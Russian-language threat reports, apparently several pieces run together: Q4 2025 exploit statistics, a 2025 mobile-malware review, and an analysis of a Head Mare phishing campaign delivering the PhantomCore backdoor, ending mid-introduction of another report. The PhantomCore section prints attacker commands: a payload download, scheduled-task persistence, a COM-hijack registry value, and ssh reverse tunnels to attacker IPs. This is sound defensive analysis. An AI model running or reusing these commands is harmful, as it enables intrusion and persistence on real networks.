29efd64dd3c7fe1e2b022b7ad73a1ba5       calc.exe

fscan
cf903e4a1629aa0582fd0363b5786676       scan_x86.exe/scan64.exe/fscan.exe

localtonet
ec2a646334a28ba4ae409fd9a21dfa21       localtonet.exe

MeshAgent
44039de9f0ea354d55240438818d58ea       c.exe/dnsclient.exe

Адреса электронной почты из записок о выкупе
[REDACTED]@laboo.boo
[email protected]
[email protected]
[email protected]
[email protected]

Домены и IP
1cbit[.]dev
akselerator.1cbit[.]dev
nextcloud.1cbit[.]dev
202.71.14[.]145
31.56.27[.]60
31.57.93[.]105
195.133.32[.]213
202.71.14[.]145
217.154.172[.]41

Четвертый квартал 2025 года стал одним из самых насыщенных по количеству публикаций громких критических уязвимостей, которые были обнаружены в популярных библиотеках и приложениях. Некоторые из этих уязвимостей сразу стали активно использоваться злоумышленниками.

В этом отчете мы рассмотрим статистику по опубликованным уязвимостям и эксплойтам, а также известные уязвимости, использованные с популярными С2-фреймворками за четвертый квартал 2025 года.

Статистика по зарегистрированным уязвимостям

Этот раздел содержит статистику по зарегистрированным уязвимостям. Данные взяты с портала cve.org.

Рассмотрим количество зарегистрированных CVE за каждый месяц на протяжении последних 5 лет до конца 2025 года включительно. Как мы и предсказывали в прошлом отчете, в четвертом квартале было зарегистрировано больше уязвимостей, чем за аналогичный период 2024 года, и общегодовые показатели также превысили суммарные результаты предыдущего года.

Общее количество опубликованных уязвимостей за каждый месяц с 2021 по 2025 год (скачать)

Теперь изучим количество новых критических уязвимостей (CVSS > 8,9) за тот же период.

Общее количество критических опубликованных уязвимостей за каждый месяц с 2021 по 2025 год (скачать)

График показывает, что количество критических уязвимостей остается достаточно внушительным, однако во второй половине года произошло сокращение их числа до показателей 2023 года. На это повлияла ротация уязвимостей: часть опубликованных проблем безопасности была отозвана. Кроме того, на количество новых критических уязвимостей повлияло повсеместное внедрение безопасных практик разработки и использования более безопасных языков программирования, хотя это не смогло решить проблему общего количества уязвимостей.

Статистика по эксплуатации уязвимостей

Раздел содержит статистику по использованию эксплойтов за четвертый квартал 2025 года. Данные получены на основании открытых источников и нашей телеметрии.

Эксплуатация уязвимостей в Windows и Linux

В четвертом квартале 2025 года самыми распространенными оказались эксплойты к тем же уязвимостям, которые использовались в атаках чаще всего на протяжении остального года. Это эксплойты в продуктах Microsoft Office с неисправленными проблемами безопасности.

Решения «Лаборатории Касперского» обнаружили больше всего эксплойтов на платформе Windows к следующим уязвимостям:

• CVE-2018-0802 — уязвимость удаленного выполнения кода в компоненте Equation Editor;
• CVE-2017-11882 — еще одна уязвимость удаленного выполнения кода, также затрагивающая Equation Editor;
• CVE-2017-0199 — уязвимость в Microsoft Office и WordPad, позволяющая атакующему захватить контроль над системой.

Этот список остается неизменным на протяжении нескольких лет.

Мы также видим, что злоумышленники продолжают адаптировать эксплойты к уязвимостям обхода каталога (CWE-35) при распаковке архивов в WinRAR. Они активно используются для получения первоначального доступа через вредоносные архивы в операционной системе Windows:

• CVE-2023-38831 — уязвимость, которая заключается в некорректной обработке объектов, содержащихся в архиве;
• CVE-2025-6218 (ранее ZDI-CAN-27198) — уязвимость, которая позволяет указать относительный путь и произвести распаковку файлов в произвольную директорию. Это может привести к выполнению вредоносных команд. Подробнее об этой уязвимости мы рассказывали в отчете за второй квартал 2025 года;
• CVE-2025-8088 — уязвимость, которую мы разбирали в предыдущем отчете, аналогичная CVE-2025-6218. В качестве механизма обхода контроля директории, в которую распаковываются файлы, злоумышленники использовали механизм NTFS Streams.

Как и в предыдущем квартале, мы отмечаем рост использования эксплойтов для архиваторов, причем чаще всего в атаках задействуются свежие уязвимости.

Ниже представлена динамика детектирования эксплойтов в системах пользователей Windows за последние два года.

Динамика числа пользователей Windows, столкнувшихся с эксплойтами, Q1 2024 — Q4 2025. За 100% принято число пользователей, столкнувшихся с эксплойтами в Q1 2024 (скачать)

Перечисленные уязвимости могут быть использованы для получения первоначального доступа к уязвимой системе. Это подчеркивает важность своевременной установки обновлений для соответствующего программного обеспечения.

На устройствах под управлением Linux чаще всего детектировались эксплойты к следующим уязвимостям:

• CVE-2022-0847 — уязвимость, известная как Dirty Pipe, которая позволяет повышать привилегии и перехватывать управление запущенными приложениями;
• CVE-2019-13272 — уязвимость некорректной обработки наследования привилегий, которая может быть использована для их повышения;
• CVE-2021-22555 — уязвимость переполнения кучи в подсистеме ядра Netfilter;
• CVE-2023-32233 — еще одна уязвимость в подсистеме Netfilter, которая позволяет создать условия для Use-After-Free и повысить привилегии за счет некорректной обработки сетевых запросов.

Динамика числа пользователей Linux, столкнувшихся с эксплойтами, Q1 2024 — Q4 2025. За 100% принято число пользователей, столкнувшихся с эксплойтами в Q1 2024 (скачать)

Мы отмечаем бурный рост количества атак с эксплойтами для Linux: в четвертом квартале с ними столкнулось в два раза больше пользователей, чем в третьем. Наша статистика демонстрирует, что на последний квартал года пришлось более половины всех атак с эксплойтами для Linux от суммарных годовых показателей. В первую очередь причиной такого всплеска стало быстрорастущее количество пользовательских устройств под управлением Linux. Отметим, что это закономерно привлекает внимание злоумышленников, в связи с чем установка патчей безопасности является критически важной.

Самые распространенные опубликованные эксплойты

Распределение опубликованных эксплойтов по типам программного обеспечения в четвертом квартале 2025 года во многом повторяет картину предыдущего квартала. Наибольшее количество эксплойтов, которые мы исследуем в рамках мониторинга публичных исследований, новостей и PoC, по-прежнему относится к уязвимостям в операционных системах.

Распределение опубликованных эксплойтов к уязвимостям по платформам, Q1 2025 (скачать)

Распределение опубликованных эксплойтов к уязвимостям по платформам, Q2 2025 (скачать)

Распределение опубликованных эксплойтов к уязвимостям по платформам, Q3 2025 (скачать)

Распределение опубликованных эксплойтов к уязвимостям по платформам, Q4 2025 (скачать)

В четвертом квартале 2025 года публичных эксплойтов для продуктов Microsoft Office не появлялось, но были обнаружены проблемы с системными компонентами, которые составляют основную часть уязвимостей. При подсчете статистики мы поместили их в категорию «ОС».

Использование уязвимостей в APT-атаках

Мы проанализировали, какие уязвимости использовались в APT-атаках в четвертом квартале 2025 года. Представленный ниже рейтинг включает данные на основе нашей телеметрии, исследований и открытых источников.

ТОР 10 уязвимостей, эксплуатируемых в APT-атаках, Q4 2025 (скачать)

В четвертом квартале 2025 года в APT-атаках чаще всего эксплуатировались свежие уязвимости, опубликованные на протяжении последних шести месяцев. Мы считаем, что эти CVE надолго станут фаворитами злоумышленников, так как для их исправления могут требоваться серьезные структурные изменения в уязвимых приложениях или пользовательской системе. Зачастую для замены или обновления затронутых компонентов необходимо значительное количество ресурсов, а следовательно, вероятность атаки через такие уязвимости может сохраняться продолжительное время. Некоторые новые уязвимости, скорее всего, станут частым инструментом для развития атак внутри инфраструктуры пользователей, так как проблемы безопасности были обнаружены в сетевых службах, доступных без аутентификации. Такая активная эксплуатация совсем недавно зарегистрированных уязвимостей говорит о возможности злоумышленников оперативно применять новые техники и адаптировать старые в атаках. Поэтому мы настоятельно рекомендуем использовать исправления безопасности, предоставленные вендорами.

C2-фреймворки

В этом разделе мы рассмотрим самые популярные C2-фреймворки, используемые злоумышленниками, и проанализируем уязвимости, эксплойты к которым взаимодействовали с C2-агентами в APT-атаках.

На графике ниже показана частота известных случаев использования С2-фреймворков в атаках на пользователей за четвертый квартал 2025 года, согласно открытым источникам.

ТОР 10 C2-фреймворков, используемых APT для компрометации систем пользователей, Q4 2025 (скачать)

Первое место в списке самых распространенных C2-фреймворков по-прежнему занимает Sliver, несмотря на большое количество следов, которое он может оставлять при использовании в стандартной конфигурации. На втором и третьем месте расположились инструменты Mythic и Havoc соответственно. Мы изучили открытые источники, проанализировали образцы вредоносных С2-агентов, содержащие эксплойты, и выяснили, что в APT-атаках с указанными выше С2-фреймворками использовались следующие уязвимости:

• CVE-2025-55182 — уязвимость React2Shell в React Server Components, позволяющая неавторизованному пользователю отправлять команды напрямую на сервер и выполнять их из оперативной памяти;
• CVE-2023-36884 — уязвимость в компоненте Поиск Windows, которая позволяет запускать команды в системе в обход механизмов защиты, встроенных в приложения Microsoft Office;
• CVE-2025-53770 — уязвимость небезопасной десериализации в Microsoft SharePoint, которая позволяет выполнять команды на сервере без аутентификации;
• CVE-2020-1472 — уязвимость, известная как Zerologon, позволяющая скомпрометировать уязвимый контроллер домена и выполнять команды с правами привилегированного пользователя;
• CVE-2021-34527 — уязвимость, известная как PrintNightmare, использующая недостатки подсистемы работы с принтерами ОС Windows, которая позволяет удаленно получать доступ к уязвимой ОС и выполнять в ней команды с высокими привилегиями;
• CVE-2025-8088 и CVE-2025-6218 — схожие уязвимости обхода каталога, которые позволяют распаковать файлы из архива по заранее заданному пути, при этом архиватор может не выдавать пользователю никаких сообщений.

Описанный набор уязвимостей позволяет определить, что злоумышленники использовали их для начала атаки и первоначальных действий в уязвимых системах, создавая условия для запуска C2-агента. Среди уязвимостей есть как зиродеи, так и достаточно известные проблемы безопасности.

Интересные уязвимости

Этот раздел содержит наиболее интересные уязвимости, которые были опубликованы в четвертом квартале 2025 года и имеют общедоступное описание.

React2Shell (CVE-2025-55182) — уязвимость в React Server Components

Обычно мы описываем уязвимости, которые, как правило, затрагивают конкретное приложение. Уязвимость CVE-2025-55182 стала исключением, поскольку она была обнаружена в библиотеке React для создания веб-приложений. Это означает, что эксплуатация уязвимости потенциально может нарушить работу большого количества приложений, которые используют библиотеку. Сама уязвимость находится в механизме взаимодействия клиентской и серверной частей, которое построено на отправке сериализованных объектов. Если злоумышленник отправит сериализованные данные с вредоносной функциональностью, то сможет выполнять команды на языке JavaScript прямо на сервере без валидации запроса со стороны клиента. Технические подробности об этой уязвимости и пример детектирования решениями «Лаборатории Касперского» можно найти в нашей статье.

CVE-2025-54100 — инъекция команд при выполнении команды curl (Invoke-WebRequest)

Уязвимость, которая представляет собой проблему некорректной обработки данных при их получении с удаленного сервера: при выполнении команды curl или Invoke-WebRequest Windows в фоне запускает Internet Explorer. Это может привести к атаке типа межсайтового скриптинга (XSS).

CVE-2025-11001 — уязвимость в 7-Zip

Эта уязвимость подкрепляет тренд на эксплуатацию проблем безопасности, найденных в архиваторах. Суть CVE-2025-11001 заключается в некорректной обработке символических ссылок. Злоумышленник может создать архив таким образом, что при его распаковке в произвольной директории содержимое архива окажется там, куда ведет символическая ссылка. Вероятность эксплуатации этой уязвимости сильно понижается, так как для использования подобной функциональности необходимо, чтобы пользователь, открывающий архив, обладал правами администратора системы.

С этой уязвимостью связана волна ошибочных новостей о применении в реальных атаках на системы пользователей: заблуждение возникло из-за ошибки в бюллетене безопасности.

RediShell (CVE-2025-49844) — уязвимость в Redis

2025 год был богат на громкие уязвимости, получившие индивидуальное наименование. Такой стала и CVE-2025-49844, также называемая RediShell, которая была раскрыта в ходе соревнований. Эта уязвимость является проблемой Use-After-Free, которая связана с работой команды load в скриптах интерпретатора Lua. Для реализации атаки злоумышленнику достаточно подготовить вредоносный скрипт и загрузить его в интерпретатор.

Как и любая именная уязвимость, RediShell была сразу же взята на вооружение злоумышленниками и спамерами, но в несколько нестандартном ключе. Так как изначально в Сети были опубликованы неполные данные о сути уязвимости, интернет наводнили поддельные PoC и сканеры, якобы предлагающие выполнить проверку на возможность эксплуатации. Однако в лучшем случае такие «сканеры» ничего не делали, а в худшем — инфицировали систему. Что примечательно, подобные проекты чаще всего были сгенерированы и оформлены при помощи LLM. Они использовали однотипный шаблон и в качестве исходного кода цитировали другие аналогичные поддельные источники.

CVE-2025-24990 — уязвимость в драйвере ltmdm64.sys

Нередко уязвимости в драйверах публикуются к легитимным сторонним приложениям из официальной поставки ОС, которые были написаны разработчиками достаточно давно. Так, уязвимость CVE-2025-24990 существовала в поставке Microsoft почти всю историю развития ОС Windows. Уязвимый драйвер поставлялся в составе ОС, начиная как минимум с Windows 7, в качестве стороннего драйвера для работы с Agere Modem. По сообщениям самой Microsoft, этот драйвер не поддерживается и после выявления уязвимости был просто исключен из поставки.

Уязвимость достаточно простая — небезопасная обработка кодов IOCTL и последующее разыменование нулевого указателя (Null Pointer Dereference). Последствиями эксплуатации могут стать выполнение вредоносных команд или, например, появление «синего экрана смерти» (BSOD) в современных системах.

CVE-2025-59287 — уязвимость в службах Windows Server Update Services (WSUS)

CVE-2025-59287 представляет собой наиболее простой вариант небезопасной десериализации. Эксплуатация возможна без аутентификации; из-за простоты использования эта уязвимость достаточно быстро приобрела популярность у злоумышленников. О технических подробностях и способах обнаружения нашими продуктами мы уже рассказывали ранее.

Выводы и рекомендации

В четвертом квартале 2025 года тренды регистрации уязвимостей продолжают сохранять темп, поэтому их мониторинг и своевременное применение патчей становятся все более важными задачами. Для обеспечения стабильной защиты критически важно регулярно оценивать и устранять известные уязвимости, а также внедрять технологии, способные снизить последствия их возможной эксплуатации.

Постоянный мониторинг состояния инфраструктуры, включая периметр, позволяет оперативно выявлять угрозы и предотвращать их развитие. Эффективная защита также предполагает отслеживание актуальных угроз и применение проактивных мер для минимизации рисков, связанных с недостатками в системах. Инструмент Kaspersky Symphony выступает в качестве надежного партнера в этом процессе, обеспечивая оперативное выявление и детализацию уязвимостей в инфраструктуре.

Безопасность рабочих мест остается приоритетным направлением: защита корпоративных устройств требует внедрения решений, способных блокировать вредоносные программы и предотвращать их распространение. Помимо базовых мер, компаниям следует внедрять адаптивные системы, позволяющие быстро применять обновления безопасности и автоматизировать управление патчами.

Начиная с третьего квартала 2025 года мы изменили методику подсчета статистических показателей на основе Kaspersky Security Network. Изменения коснулись всех разделов отчета, кроме статистики по установочным пакетам, на которую они не повлияли.

Для демонстрации динамики между отчетными периодами мы также пересчитали данные за предыдущий год, поэтому они могут значительно отличаться от опубликованных ранее. При этом последующие отчеты будут формироваться по новой методике, что позволит корректно сопоставлять данные с представленными в этой статье.

Kaspersky Security Network (KSN) — это глобальная сеть для анализа анонимизированной информации об угрозах, добровольно предоставленной пользователями решений «Лаборатории Касперского». Статистика в этом отчете основана на данных KSN, если явно не указано иного.

Цифры года

По данным Kaspersky Security Network, в 2025 году:

• Было предотвращено более 14 миллионов атак с использованием вредоносного, рекламного или нежелательного мобильного ПО.
• Самой распространенной угрозой для мобильных устройств традиционно стало рекламное ПО (AdWare) — 62% от всех обнаруженных угроз.
• Было обнаружено более 815 тысяч вредоносных установочных пакетов, из которых 255 тысяч относились к мобильным банковским троянцам.

Особенности года

В 2025 году злоумышленники совершали в среднем около 1,17 миллиона атак на мобильные устройства в месяц с использованием вредоносного, рекламного или нежелательного ПО. Всего решения «Лаборатории Касперского» за год предотвратили 14 059 465 атак.

Количество атак на пользователей мобильных решений «Лаборатории Касперского», 2025 г. (скачать)

В 2025 году, помимо вредоносного ПО, упомянутого в предыдущих квартальных отчетах, было найдено множество других знаковых троянцев. В частности, в четвертом квартале мы обнаружили предустановленный бэкдор Keenadu. Он попадает в прошивки устройств на этапе сборки. Вредоносный код встраивается в libandroid_runtime.so — ключевую библиотеку для работы Java-среды на Android, благодаря чему копия бэкдора попадает в адресное пространство всех запущенных приложений на устройстве. Далее, в зависимости от приложения, зловред может, например, накручивать просмотры рекламы, показывать баннеры от имени других приложений, подменять поисковые запросы. Функциональность Keenadu не ограничена, так как его вредоносные модули скачиваются динамически и могут обновляться.

Также исследователи кибербезопасности обнаружили IoT-ботнет Kimwolf, нацеленный на приставки Android TV. Зараженные устройства могли проводить DDoS-атаки, а также работать в режиме обратного прокси и выполнять вредоносные действия через реверс-шелл. Позже выяснилось, что функциональность обратного прокси Kimwolf использовалась провайдерами прокси через домашние устройства в качестве выходных точек (residential proxy).

Еще одной интересной находкой 2025 года стал троянец-шпион LunaSpy.

Экран троянца LunaSpy, который распространяется под видом антивируса

Этот шпион, мимикрирующий под антивирусное ПО, ворует пароли из браузеров и мессенджеров, SMS, журналы звонков. Также он может записывать звук с микрофона и видео с камеры устройства. Эта угроза в основном была нацелена на российских пользователей.

Статистика мобильных угроз

В 2025 году количество новых уникальных установочных пакетов снизилось по сравнению с предыдущим годом и составило 815 735. Если в 2024 году сокращение числа пакетов было не таким ярко выраженным, то в прошлом году этот показатель снизился почти на треть.

Количество обнаруженных вредоносных и нежелательных установочных пакетов для Android, 2022–2025 гг. (скачать)

Общее уменьшение числа обнаруженных пакетов обусловлено сокращением количества приложений из категории not-a-virus. При этом количество троянцев значительно выросло, что хорошо видно на распределении ниже.

Распределение найденных пакетов по типам

Распределение* детектируемых мобильных программ по типам, 2024 и 2025 гг. (скачать)

* Данные за предыдущий год могут отличаться от опубликованных ранее в связи с ретроспективным пересмотром некоторых вердиктов.

Существенный рост числа приложений категорий Trojan-Banker и Trojan-Spy сопровождался уменьшением количества файлов AdWare и RiskTool.
Самыми популярными банковскими троянцами стали приложения Mamont (49,8% приложений) и Creduz (22,5%). Ведущие позиции среди назойливых реклам занимают MobiDash (39%), Adlo (27%) и HiddenAd (20%).

Доля* пользователей, атакованных определенным типом вредоносного или нежелательного ПО, от всех атакованных пользователей мобильных продуктов «Лаборатории Касперского», 2024 и 2025 гг. (скачать)

* Сумма может быть больше 100%, если одни и те же пользователи столкнулись с несколькими типами атак.

Вредоносные программы типа Trojan-Banker значительно нарастили свои показатели не только по числу файлов, но и по числу атак. Тем не менее они расположились на четвертой строчке, значительно уступая по числу атак вредоносным файлам категории Trojan: преимущественно различным модификациям Triada и Fakemoney.

TOP 20 мобильных вредоносных программ

В приведенный ниже рейтинг вредоносных программ не входят потенциально опасные или нежелательные программы, такие как RiskTool и AdWare.

* Доля уникальных пользователей, столкнувшихся с данным зловредом, от всех атакованных пользователей мобильных решений «Лаборатории Касперского».

Большую часть списка занимают троянцы семейства Triada, распространяющиеся в виде вредоносных модификаций популярных мессенджеров. Другой вариант заражения: жертве предлагают установить оригинальный мессенджер в «кастомизированную виртуальную среду», в которой якобы можно настраивать работу приложения. Скам-приложения Fakemoney, предлагающие жертвам якобы инвестировать средства либо получить поддельные выплаты, по-прежнему достаточно часто атакуют пользователей — они оказались на третьей строчке в нашей статистике. Банковские троянцы Mamont занимают 6-ю, 8-ю и 18-ю строчки по количеству атак. На девятую позицию попал предустановленный в прошивках некоторых устройств бэкдор Triada.

Региональное вредоносное ПО

В этом разделе мы описываем вредоносное ПО, атаки с использованием которого сконцентрированы в определенных странах.

* Страна с наибольшей активностью зловреда.
** Доля уникальных пользователей, столкнувшихся с данным зловредом в указанной стране, от всех атакованных этим же зловредом пользователей мобильных решений «Лаборатории Касперского».

Турецкие пользователи чаще всего подвергались атакам банковских троянцев Coper и их дропперов Hqwar. В Индии продолжали распространяться троянцы Rewardsteal, похищающие платежные данные жертвы под предлогом раздачи денег. Также в Индии возобновилась активность троянца Thamera, частые атаки которого мы ранее фиксировали в 2023 году. Этот зловред регистрирует аккаунты в социальных сетях с устройства жертвы.

Сосредоточенный в Германии Trojan-Proxy.AndroidOS.Agent.q был встроен в стороннее приложение для просмотра актуальных скидок в сети крупных немецких магазинов. Злоумышленники похищали средства жертв через несанкционированное использование устройства клиента в качестве выходной точки прокси.

В Бразилии в 2025 году были сконцентрированы атаки троянцев Pylcasa, используемых для того, чтобы направить пользователей на фишинговые страницы или сайты нелегальных казино.

Мобильные банковские троянцы

Количество новых установочных пакетов банковских троянцев резко выросло и составило 255 090 пакетов, что в разы превышает показатели прошлых лет.

Количество установочных пакетов мобильных банковских троянцев, обнаруженных «Лабораторией Касперского», 2022–2025 гг. (скачать)

Отметим, что общее число атак с использованием банкеров так же, как и в предыдущем году, выросло в полтора раза. Принимая во внимание резкий рост количества установочных пакетов этих зловредов, мы можем предположить, что такие атаки приносят злоумышленникам значительную выгоду. Это подтверждается и тем, что киберпреступники продолжают как развивать каналы доставки зловредов, так и наращивать объемы создания новых модификаций в попытках помешать детектированию защитными решениями.

TOP 10 мобильных банкеров

* Доля уникальных пользователей, столкнувшихся с данным зловредом, от всех атакованных банковскими угрозами пользователей мобильных защитных решений «Лаборатории Касперского».

В 2025 году мы наблюдали бурную активность банковских троянцев Mamont: они заняли около половины от общего числа новых приложений своей категории, и они же использовались в половине всех атак банковскими троянцами.

Заключение

В 2025 году продолжился тренд на снижение общего количества уникальных установочных пакетов нежелательного ПО. При этом мы отмечаем значительный рост в детектировании некоторых угроз относительно предыдущего года, в частности мобильных банковских троянцев и шпионов, однако большинство обнаруженных угроз по-прежнему оказалось рекламными приложениями.

Среди зафиксированных мобильных угроз мы стали чаще встречать предустановленные бэкдоры, такие как Triada и Keenadu. Как и в прошлом году, некоторые мобильные зловреды продолжают распространяться через официальные магазины приложений. Мы также отмечаем интерес злоумышленников к использованию зараженных устройств в качестве прокси.

В феврале 2026 года хактивистская группировка Head Mare продолжает привлекать к себе внимание киберсообщества. Не успели мы рассказать о кампании с использованием PhantomHeart, как обнаружили еще одну масштабную фишинговую рассылку, на этот раз с новой версией бэкдора PhantomCore (PhantomDL). Получателям приходят письма от имени научно-исследовательской организации с предложением о заключении договора. Во вложениях находятся зашифрованные архивы, а в качестве пароля используется текущий год. В архиве — несколько файлов‑ярлыков (.lnk), которые автоматически запускают процесс загрузки и установки бэкдора.

В этой статье мы разберем технические детали атаки, оценим потенциальный масштаб угрозы и обсудим рекомендации по защите от подобных кампаний.

Вредоносная рассылка

Письмо написано от имени «ведущего специалиста договорного отдела» научно-исследовательской организации и выглядит как предложение подписать договор на выполнение неких работ. Отправитель предлагает скачать архив с документами, имеющими какое-то отношение к этому договору. Архив запаролен, пароль указан в теле письма — текущий год. Получателя просят сообщить, когда будет удобно заключить договор. В подписи указаны подробные контактные данные «ведущего специалиста»: фамилия, имя и отчество, должность, номер телефона с добавочным, корпоративный e‑mail и адрес сайта. Все оформлено так, чтобы создать ощущение делового общения и подтолкнуть получателя открыть вложение.

Содержимое фишингового письма

В архиве находится несколько ярлыков с двойным расширением .pdf.lnk, которые маскируются под проект договора, техническое задание и другие релевантные для заданной в письме темы документы.

Содержимое архива «Комплект Документов.rar»

При запуске любого из ярлыков на машине выполнится команда для загрузки промежуточного скрипта, расположенного на сервере злоумышленников.

Команда из ярлыка «Карточка предприятия [REDACTED] (общий счет).pdf.lnk»

Скрипт для загрузки бэкдора

Стоит отметить, что ярлыки работают схожим образом. Единственное отличие между ними — это ссылки, по которым будут загружаться бэкдоры и документы. За каждым ярлыком закреплен документ, соответствующий его названию, при этом бэкдор всегда скачивается один и тот же.

Документы-приманки, открываемые ярлыками из архива

Промежуточный скрипт написан на PowerShell. Он скачивает с удаленного сервера файл USOCachedData.txt (MD5: 6EA2912050632ACD186CE790634B6D44), обеспечивает закрепление в системе и автозапуск. Для закрепления используется техника PSFactoryBuffer COM Hijacking — подмена в реестре пути к одной из системных библиотек, которые используются при создании COM-объектов. В результате всякий раз, когда стороннее приложение обращается к соответствующему COM-объекту, запускается вредоносный файл.

$HKCR\CLSID\{c53e07ec-25f3-4093-aa39-fc67ea22e99d}\InProcServer32
(Default)=$APPDATA\USOShared\USOCachedData.txt

Файл USOCachedData.txt, хоть и имеет расширение .txt, на самом деле является исполняемой библиотекой — новым вариантом PhantomCore. Основная задача этого бэкдора — предоставление злоумышленникам удаленной командной строки в зараженной системе.

Образец, который распространяется в рамках описанной кампании, написан на C++, а строки в нем зашифрованы побайтовым XOR с уникальными ключами для каждой строки. После запуска бэкдор отправляет на C2-сервер два POST-запроса, содержащие данные в формате JSON, — для регистрации нового бота и получения команд. По сравнению с прошлыми версиями пути, по которым PhantomCore связывается с C2, незначительно изменились. Изменились и названия и содержимое полей в отправляемом на С2 JSON.

Коммуникация PhantomCore с C2

В запросе на регистрацию PhantomCore передает закодированные в base64 данные о боте и зараженной системе. Декодированная строка с данными выглядит следующим образом:

{"id":"38805794b185c7b6","hostname":"DESKTOP-EMTAAUC","logon_server":"","local_ip":"10.1.1.140","dns_server":"10.1.1.1"}

Во втором запросе бэкдор отправляет только идентификатор бота. В ответ злоумышленники передают следующую последовательность команд, которую бэкдор пытается выполнить в зараженной системе.

• Скачивание архива с вредоносным ПО для создания туннеля. Внутри архива находится файл TemplateMaintenanceHost.exe.
  

  cmd.exe /c powershell iwr https://defendcore.online/download/1.zip -outfile $appdata\1.zip

• Распаковка содержимого архива в директорию AppData.
  

  cmd.exe /c powershell expand-archive -force -path $appdata\1.zip -destinationpath $appdata

• Проверка успешной распаковки.
  

  cmd.exe /c dir $appdata

• Закрепление в системе с помощью задачи планировщика.
  

  cmd.exe /c schtasks /create /sc DAILY /tn "Windows Templates Maintenance Task" /tr "$appdata\TemplateMaintenanceHost.exe -i 31.59.104.239 -p 45631 -u sadjio8sdjajdssdw" /st 10:00 /f

• Запуск задачи, созданной предыдущей командой.
  

  cmd.exe /c schtasks /run /tn "Windows Templates Maintenance Task"

Файл TemplateMaintenanceHost.exe — это модуль для запуска ssh.exe, написанный на Golang. Файл ssh.exe присутствует в последних версиях ОС Windows по умолчанию. TemplateMaintenanceHost.exe запускает его с переданными в командной строке параметрами либо с параметрами по умолчанию, если злоумышленники не задали ничего конкретного. Так, если командная строка выглядит как TemplateMaintenanceHost.exe -i 31.59.104.239 -p 45631 -u sadjio8sdjajdssdw, процесс ssh.exe будет запущен со следующими параметрами:

ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 45631 -p 443 [email protected]

А при запуске командой TemplateMaintenanceHost.exe  -i 195.58.54.238  будут использованы параметры по умолчанию:

ssh.exe -o StrictHostKeyChecking=no -o ServerAliveInterval=60 -o ServerAliveCountMax=15 -f -N -R 48733 -p 443 [email protected]

Запуск ssh.exe с таким набором аргументов приводит к созданию туннеля с удаленным хостом. При этом сам процесс ssh.exe выступает в роли SOCKS5-прокси и способен перенаправлять трафик от удаленного сервера в локальную сеть через зараженную машину, давая атакующим возможность подключаться к другим рабочим станциям и серверам.

Жертвы

Новая рассылка Head Mare затронула несколько сотен пользователей из российских организаций. Среди целей были как организации из государственного сектора, так и компании из логистической, финансовой и промышленной отраслей.

Индикаторы компрометации

Архивы
0b7262cbdab759e711b2d0ebe81b3cbb
2a7e7b5d95fd63bce42ae1e6aa9f8fbf
a9688994151ad2d732b7d8743c48d779

Ярлыки
1bc7a6056d5b35a938d67e3bf81da5e8 — техническое задание.pdf.lnk
2bf231028463eca661b0fd78184020fd — проект договора на выполнение работ.pdf.lnk
ae9e60196f7c873d346db1a884bb8f21 — карточка предприятия [REDACTED] (общий счет).pdf.lnk
1473be0903d1342b79dc066c0264a1b8 — техническое задание.pdf.lnk
b14cd85092e7b6a58db8822708fc158f — проект договора на выполнение работ.pdf.lnk
c58df00cd9caac4798dd89703a46c3b8 — карточка предприятия [REDACTED] (общий счет).pdf.lnk
025756c52670841936e15ec17df56f04 — техническое задание.pdf.lnk
7a51be2d79c63e5a372bdee6adc1b8f3 — проект договора на выполнение работ.pdf.lnk
c6cf2307caefd444b77d02555226779f — карточка предприятия [REDACTED] (общий счет).pdf.lnk
6def6f248bf5f204c402191aaead05e4 — проект договора на выполнение работ.pdf.lnk
8a4f149fc61148be9e10edd19f8eb05b — техническое задание.pdf.lnk
96f6cf42eb88cf861bb2ada14db68924 — карточка предприятия [REDACTED] (общий счет).pdf.lnk

URL-адреса
hxxps://1cbit-dev[.]com/controllers/interface/kappa/package.html
hxxps://1cbit-dev[.]com/controllers/interface/kappa/files.html
hxxps://1cbit-dev[.]com/controllers/interface/kappa/downloads.html
hxxps://1cbit-dev[.]com/clusters/network/omega/files.html
hxxps://1cbit-dev[.]com/clusters/network/omega/connect.html
hxxps://1cbit-dev[.]com/clusters/network/omega/access.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/patch.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/upgrade.html
hxxps://1cbit-dev[.]com/devices/firmware/beta/update.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/package.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/files.html
hxxps://1cbit-dev[.]com/hardware/archive/alpha/get.html
hxxps://defendcore[.]online/download/1.zip

PhantomCore MD5
6EA2912050632ACD186CE790634B6D44
456AE6D4C3FCED28BB40389473C148DE
03573CC2710D3A1B891F638C4113168B
F4DBE5F1C7E872DB6F1258E8C2C4DBBF
052FD127AF44991E536608C54B1B8442
0B4A9E34C5455A627EA460538143A05F
250E9003EDBB5EB20FE02A3FBDD173EE
2F8DCAA6A262D69AA83E54E2A0634B55
56E574FF9E3D417AF55FE867AFCEFA79
ABAA834680F12B1B17D113E039001E1D
D24329DD3AD1876FFEC84FD169245343
D458F12D551F8C600D132056C6549C68

PhantomCore C2
cosmetic-shop[.]online
moscow-media[.]online
cheap-market[.]online
cheap-zone[.]online

Модуль для запуска SSH на Golang
FDF5DC59B2947FF7DA9D86DA40B49248

Введение

В начале ноября 2025 года мы выявили новую вредоносную кампанию, нацеленную на российские организации. Атаки продолжаются и на момент публикации материала. На основании собранных данных: артефактов, инструментария и сетевой инфраструктуры, мы можем уверенно утверждать, что за этой активностью стоит группа Librarian Likho (Librarian Ghouls). В статье мы разберем текущую кампанию злоумышленников в сравнении с предыдущей.

Краткий обзор изменений в техниках Librarian Likho

Как и ранее, атаки начинаются с фишинга, однако в этот раз с момента начала кампании злоумышленники отправили свыше тысячи писем, вредоносные вложения в которых практически не отличались по функциональности и контексту, что указывает на автоматизацию атаки. Инструментарий также по большей части остался прежним, но в новой волне атак злоумышленники переписали команды в скриптах: ранее URL командного сервера жестко прописывали в коде, а теперь он динамически меняется при помощи набора переменных. Убрали функции кражи данных и обновили механизмы обхода средств защиты информации.

Подробности атаки

